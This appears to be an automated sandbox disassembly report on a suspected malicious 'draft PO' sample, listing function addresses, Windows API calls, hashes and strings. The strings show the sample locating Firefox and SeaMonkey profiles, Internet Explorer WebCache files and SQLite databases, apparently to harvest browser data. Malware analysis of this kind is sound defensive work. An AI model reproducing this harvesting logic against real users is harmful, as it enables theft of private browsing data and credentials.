                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                • API String ID: 4039892925-2068335096
                                                                                • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                • API String ID: 4039892925-3369679110
                                                                                • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                • API String ID: 3510742995-2641926074
                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                • API String ID: 2758756878-1896041820
                                                                                • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2941347001-0
                                                                                • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                • API String ID: 1534475566-1174173950
                                                                                • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                APIs
                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 71295984-2036018995
                                                                                • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004087D6
                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                • memset.MSVCRT ref: 00408828
                                                                                • memset.MSVCRT ref: 00408840
                                                                                • memset.MSVCRT ref: 00408858
                                                                                • memset.MSVCRT ref: 00408870
                                                                                • memset.MSVCRT ref: 00408888
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 2911713577-0
                                                                                • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 1475443563-3708268960
                                                                                • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 1579243037-1578091866
                                                                                • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2887208581-2114579845
                                                                                • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                APIs
                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                APIs
                                                                                • ??3@YAXPAX@Z.MSVCRT(020F0048), ref: 0044DF01
                                                                                • ??3@YAXPAX@Z.MSVCRT(02100050), ref: 0044DF11
                                                                                • ??3@YAXPAX@Z.MSVCRT(00946D38), ref: 0044DF21
                                                                                • ??3@YAXPAX@Z.MSVCRT(02100458), ref: 0044DF31
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
